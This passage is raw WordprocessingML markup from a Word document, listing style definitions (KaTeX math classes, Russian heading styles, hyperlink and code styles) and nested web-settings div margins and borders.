    <w:name w:val="mfrac"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="frac-line">
    <w:name w:val="frac-line"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="svg-align">
    <w:name w:val="svg-align"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hide-tail">
    <w:name w:val="hide-tail"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="boxpad">
    <w:name w:val="boxpad"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="stretchy">
    <w:name w:val="stretchy"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:styleId="HTML">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E21AC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2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21ACE"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="inline-markdown">
    <w:name w:val="inline-markdown"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00E21ACE"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mtight">
    <w:name w:val="mtight"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009139EF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="Заголовок 1 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00F854A0"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a7">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F854A0"/>
    <w:rPr>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="z-">
    <w:name w:val="HTML Top of Form"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="z-0"/>
    <w:hidden/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F854A0"/>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F854A0"/>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F854A0"/>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F854A0"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
      <w:vanish/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a8">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a9"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F854A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F854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F854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70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5220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2200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22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2200D"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a5">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0052200D"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a6">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="0052200D"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="20">
    <w:name w:val="Заголовок 2 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00870958"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="contents">
    <w:name w:val="contents"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="paragraph-kknbio">
    <w:name w:val="paragraph-kknbio"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="008709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870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="katex-mathml">
    <w:name w:val="katex-mathml"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="katex-html">
    <w:name w:val="katex-html"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="base">
    <w:name w:val="base"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="strut">
    <w:name w:val="strut"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mord">
    <w:name w:val="mord"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mspace">
    <w:name w:val="mspace"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mrel">
    <w:name w:val="mrel"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mpunct">
    <w:name w:val="mpunct"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="minner">
    <w:name w:val="minner"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="block">
    <w:name w:val="block"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="katex-display">
    <w:name w:val="katex-display"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="msupsub">
    <w:name w:val="msupsub"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="vlist-t">
    <w:name w:val="vlist-t"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="vlist-r">
    <w:name w:val="vlist-r"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="vlist">
    <w:name w:val="vlist"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pstrut">
    <w:name w:val="pstrut"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="sizing">
    <w:name w:val="sizing"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="vlist-s">
    <w:name w:val="vlist-s"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mopen">
    <w:name w:val="mopen"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mclose">
    <w:name w:val="mclose"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mbin">
    <w:name w:val="mbin"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="delimsizing">
    <w:name w:val="delimsizing"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mfrac">
    <w:name w:val="mfrac"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="frac-line">
    <w:name w:val="frac-line"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="svg-align">
    <w:name w:val="svg-align"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hide-tail">
    <w:name w:val="hide-tail"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="boxpad">
    <w:name w:val="boxpad"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="stretchy">
    <w:name w:val="stretchy"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:styleId="HTML">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E21AC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2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21ACE"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="inline-markdown">
    <w:name w:val="inline-markdown"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00E21ACE"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mtight">
    <w:name w:val="mtight"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009139EF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="Заголовок 1 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00F854A0"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a7">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F854A0"/>
    <w:rPr>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="z-">
    <w:name w:val="HTML Top of Form"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="z-0"/>
    <w:hidden/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F854A0"/>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F854A0"/>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F854A0"/>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F854A0"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
      <w:vanish/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a8">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a9"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F854A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F854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53280">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1144082858">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1956407103">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="555313806">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1891919221">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1150437725">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="5310"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="77096200">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="2" w:color="FFFFFF"/>
                <w:left w:val="single" w:sz="6" w:space="2" w:color="FFFFFF"/>
                <w:bottom w:val="single" w:sz="2" w:space="2" w:color="FFFFFF"/>
                <w:right w:val="single" w:sz="2" w:space="11" w:color="FFFFFF"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="290479389">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="2" w:color="FFFFFF"/>
                <w:left w:val="single" w:sz="6" w:space="2" w:color="FFFFFF"/>
                <w:bottom w:val="single" w:sz="2" w:space="2" w:color="FFFFFF"/>
                <w:right w:val="single" w:sz="2" w:space="11" w:color="FFFFFF"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1390378715">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="2" w:color="FFFFFF"/>
                <w:left w:val="single" w:sz="6" w:space="2" w:color="FFFFFF"/>
                <w:bottom w:val="single" w:sz="2" w:space="2" w:color="FFFFFF"/>
                <w:right w:val="single" w:sz="2" w:space="11" w:color="FFFFFF"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="13852480">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="2" w:color="FFFFFF"/>
                <w:left w:val="single" w:sz="6" w:space="4" w:color="FFFFFF"/>
                <w:bottom w:val="single" w:sz="2" w:space="2" w:color="FFFFFF"/>
                <w:right w:val="single" w:sz="2" w:space="11" w:color="FFFFFF"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="146318784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13627061">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1046830199">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="120"/>
          <w:marTop w:val="72"/>
          <w:marBottom w:val="120"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1551763125">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="532421234">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="240"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="253829469">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1847285683">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="348680443">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1341540371">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                    <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                    <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                    <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="2135438515">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                        <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                        <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                        <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="100612757">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                            <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                            <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                            <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="1753428835">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                                <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                                <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                                <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="1904102905">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                                    <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                                    <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="787773391">
                                      <w:marLeft w:val="0"/>
                                      <w:marRight w:val="0"/>
                                      <w:marTop w:val="0"/>
                                      <w:marBottom w:val="0"/>
                                      <w:divBdr>
                                        <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                                        <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                                        <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                                        <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                                      </w:divBdr>
                                      <w:divsChild>
                                        <w:div w:id="705449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8200813">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="800920395">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1987778633">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                    <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                    <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                    <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="850799028">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                        <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                        <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                        <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="1732918254">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="240"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                            <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                            <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                            <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="1904369416">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                                <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                                <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                                <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="1608924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5381559">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1739939544">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1032801645">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
